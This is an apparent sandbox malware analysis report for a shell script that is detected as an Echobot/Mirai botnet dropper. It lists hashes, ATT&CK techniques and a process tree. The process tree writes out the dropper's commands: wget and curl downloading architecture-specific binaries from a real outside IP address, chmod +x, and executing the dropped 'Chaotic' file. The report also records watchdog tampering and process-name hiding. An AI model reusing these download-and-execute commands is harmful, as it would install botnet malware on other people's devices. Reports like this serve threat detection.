echobot | b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30

Analysis

max time kernel
149s
max time network
151s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
25-11-2024 21:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

81eee2b1d28af46c8e9190b0c20fce28
SHA1

8025e6d6f83b129d6c7a11a684d5d6f54d160333
SHA256

b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30
SHA512

359baa5371f4f8cbd4c3caf9cb1b02624b22d8cadd63722c2a9db673e73df55f6f75988e988911ee731e3b30b5a1c22207cd9a8aebb933c38bab17f9a1f8df45

Score

10^/10

echobot mirai botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 1 IoCs

Processes:

resource yara_rule

/tmp/Chaotic family_echobot
Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (131519) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

1613 chmod
1635 chmod
1649 chmod
1705 chmod
1677 chmod
1520 chmod
1525 chmod
1539 chmod
1597 chmod
1555 chmod
1663 chmod
1719 chmod
1569 chmod
1583 chmod
1691 chmod

resource	yara_rule
/tmp/Chaotic	family_echobot

pid	process
1613	chmod
1635	chmod
1649	chmod
1705	chmod
1677	chmod
1520	chmod
1525	chmod
1539	chmod
1597	chmod
1555	chmod
1663	chmod
1719	chmod
1569	chmod
1583	chmod
1691	chmod

Executes dropped EXE 15 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

ioc	pid	process
/tmp/Chaotic	1521	Chaotic
/tmp/Chaotic	1526	Chaotic
/tmp/Chaotic	1540	Chaotic
/tmp/Chaotic	1556	Chaotic
/tmp/Chaotic	1570	Chaotic
/tmp/Chaotic	1584	Chaotic
/tmp/Chaotic	1598	Chaotic
/tmp/Chaotic	1614	Chaotic
/tmp/Chaotic	1636	Chaotic
/tmp/Chaotic	1650	Chaotic
/tmp/Chaotic	1664	Chaotic
/tmp/Chaotic	1678	Chaotic
/tmp/Chaotic	1692	Chaotic
/tmp/Chaotic	1706	Chaotic
/tmp/Chaotic	1720	Chaotic

Modifies Watchdog functionality 1 TTPs 28 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates active TCP sockets 1 TTPs 14 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 14 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	pid	process
Changes the process name, possibly in an attempt to hide itself	1526	Chaotic
Changes the process name, possibly in an attempt to hide itself	1540	Chaotic
Changes the process name, possibly in an attempt to hide itself	1556	Chaotic
Changes the process name, possibly in an attempt to hide itself	1570	Chaotic
Changes the process name, possibly in an attempt to hide itself	1584	Chaotic
Changes the process name, possibly in an attempt to hide itself	1598	Chaotic
Changes the process name, possibly in an attempt to hide itself	1614	Chaotic
Changes the process name, possibly in an attempt to hide itself	1636	Chaotic
Changes the process name, possibly in an attempt to hide itself	1650	Chaotic
Changes the process name, possibly in an attempt to hide itself	1664	Chaotic
Changes the process name, possibly in an attempt to hide itself	1678	Chaotic
Changes the process name, possibly in an attempt to hide itself	1692	Chaotic
Changes the process name, possibly in an attempt to hide itself	1706	Chaotic
Changes the process name, possibly in an attempt to hide itself	1720	Chaotic

Reads system network configuration 1 TTPs 14 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/1068/fd	Chaotic
File opened for reading	/proc/485/fd	Chaotic
File opened for reading	/proc/1623/exe	Chaotic
File opened for reading	/proc/1160/fd	Chaotic
File opened for reading	/proc/1173/fd	Chaotic
File opened for reading	/proc/538/fd	Chaotic
File opened for reading	/proc/1503/exe	Chaotic
File opened for reading	/proc/656/fd	Chaotic
File opened for reading	/proc/688/fd	Chaotic
File opened for reading	/proc/1191/fd	Chaotic
File opened for reading	/proc/1179/fd	Chaotic
File opened for reading	/proc/1051/fd	Chaotic
File opened for reading	/proc/1121/exe	Chaotic
File opened for reading	/proc/476/fd	Chaotic
File opened for reading	/proc/1174/fd	Chaotic
File opened for reading	/proc/539/fd	Chaotic
File opened for reading	/proc/1482/fd	Chaotic
File opened for reading	/proc/1187/fd	Chaotic
File opened for reading	/proc/1179/fd	Chaotic
File opened for reading	/proc/1278/fd	Chaotic
File opened for reading	/proc/471/fd	Chaotic
File opened for reading	/proc/675/fd	Chaotic
File opened for reading	/proc/1190/fd	Chaotic
File opened for reading	/proc/1515/fd	Chaotic
File opened for reading	/proc/596/fd	Chaotic
File opened for reading	/proc/999/fd	Chaotic
File opened for reading	/proc/1137/fd	Chaotic
File opened for reading	/proc/1192/fd	Chaotic
File opened for reading	/proc/1355/fd	Chaotic
File opened for reading	/proc/281/fd	Chaotic
File opened for reading	/proc/316/fd	Chaotic
File opened for reading	/proc/1078/fd	Chaotic
File opened for reading	/proc/1265/fd	Chaotic
File opened for reading	/proc/1191/fd	Chaotic
File opened for reading	/proc/1101/fd	Chaotic
File opened for reading	/proc/1031/fd	Chaotic
File opened for reading	/proc/1026/fd	Chaotic
File opened for reading	/proc/1101/fd	Chaotic
File opened for reading	/proc/538/exe	Chaotic
File opened for reading	/proc/1542/fd	Chaotic
File opened for reading	/proc/316/fd	Chaotic
File opened for reading	/proc/1190/fd	Chaotic
File opened for reading	/proc/1191/fd	Chaotic
File opened for reading	/proc/992/fd	Chaotic
File opened for reading	/proc/1072/fd	Chaotic
File opened for reading	/proc/422/fd	Chaotic
File opened for reading	/proc/596/fd	Chaotic
File opened for reading	/proc/457/fd	Chaotic
File opened for reading	/proc/485/fd	Chaotic
File opened for reading	/proc/701/fd	Chaotic
File opened for reading	/proc/1146/fd	Chaotic
File opened for reading	/proc/422/fd	Chaotic
File opened for reading	/proc/1068/fd	Chaotic
File opened for reading	/proc/539/exe	Chaotic
File opened for reading	/proc/416/fd	Chaotic
File opened for reading	/proc/1265/fd	Chaotic
File opened for reading	/proc/1190/fd	Chaotic
File opened for reading	/proc/1265/fd	Chaotic
File opened for reading	/proc/1265/fd	Chaotic
File opened for reading	/proc/1031/fd	Chaotic
File opened for reading	/proc/1167/fd	Chaotic
File opened for reading	/proc/476/fd	Chaotic
File opened for reading	/proc/1773/exe	Chaotic
File opened for reading	/proc/675/fd	Chaotic

System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlwgetcurl

pid process

1574 wget
1581 curl
1560 wget
1567 curl

pid	process
1574	wget
1581	curl
1560	wget
1567	curl

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlwgetcurlwgetcurlwgetcurlwgetcurlcurlcurlwgetcurlohshit.shwgetcurlcurlcurlcurlcurlwgetwgetwgetwgetcp

description	ioc	process
File opened for modification	/tmp/jade.mips	curl
File opened for modification	/tmp/jade.arm6	curl
File opened for modification	/tmp/jade.i686	curl
File opened for modification	/tmp/jade.arm5	wget
File opened for modification	/tmp/jade.sparc	curl
File opened for modification	/tmp/jade.sh4	wget
File opened for modification	/tmp/jade.arm	curl
File opened for modification	/tmp/jade.arm7	wget
File opened for modification	/tmp/jade.x86	curl
File opened for modification	/tmp/jade.ppc	wget
File opened for modification	/tmp/jade.mpsl	curl
File opened for modification	/tmp/jade.arm7	curl
File opened for modification	/tmp/jade.m68k	curl
File opened for modification	/tmp/jade.arm6	wget
File opened for modification	/tmp/jade.x86_64	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/jade.x86	wget
File opened for modification	/tmp/jade.mips64	curl
File opened for modification	/tmp/jade.arm5	curl
File opened for modification	/tmp/jade.ppc	curl
File opened for modification	/tmp/jade.sh4	curl
File opened for modification	/tmp/jade.arc	curl
File opened for modification	/tmp/jade.mips	wget
File opened for modification	/tmp/jade.mpsl	wget
File opened for modification	/tmp/jade.arm	wget
File opened for modification	/tmp/jade.m68k	wget
File opened for modification	/tmp/busybox	cp

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:1511
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1512
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arc
  2⤵
  PID:1513
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arc
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/cat
  cat jade.arc
  2⤵
  PID:1519
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:1521
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86
  2⤵
  - Writes file to tmp directory
  PID:1522
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/cat
  cat jade.x86
  2⤵
  PID:1524
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.x86 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1526
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86_64
  2⤵
  PID:1530
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1540
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.i686
  2⤵
  PID:1546
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.i686
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.i686 jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1556
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1560
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1567
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.i686 jade.mips jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1569
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1570
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1574
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1581
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.i686 jade.mips jade.mips64 jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1583
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1584
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1588
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1595
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-PSdlha
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1598
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm
  2⤵
  - Writes file to tmp directory
  PID:1604
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm
  2⤵
  - Writes file to tmp directory
  PID:1611
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1613
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1614
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm5
  2⤵
  - Writes file to tmp directory
  PID:1626
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm5
  2⤵
  - Writes file to tmp directory
  PID:1633
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1635
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1636
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm6
  2⤵
  - Writes file to tmp directory
  PID:1640
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm6
  2⤵
  - Writes file to tmp directory
  PID:1647
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.arm6 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1649
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1650
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm7
  2⤵
  - Writes file to tmp directory
  PID:1654
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm7
  2⤵
  - Writes file to tmp directory
  PID:1661
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1663
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1664
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.ppc
  2⤵
  - Writes file to tmp directory
  PID:1668
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.ppc
  2⤵
  - Writes file to tmp directory
  PID:1675
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1677
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1678
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sparc
  2⤵
  PID:1682
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sparc
  2⤵
  - Writes file to tmp directory
  PID:1689
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1691
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1692
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.m68k
  2⤵
  - Writes file to tmp directory
  PID:1696
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.m68k
  2⤵
  - Writes file to tmp directory
  PID:1703
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1705
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1706
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sh4
  2⤵
  - Writes file to tmp directory
  PID:1710
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sh4
  2⤵
  - Writes file to tmp directory
  PID:1717
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sh4 jade.sparc jade.x86 jade.x86_64 netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-wmjrJm systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra
  2⤵
  - File and Directory Permissions Modification
  PID:1719
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:1720

Network

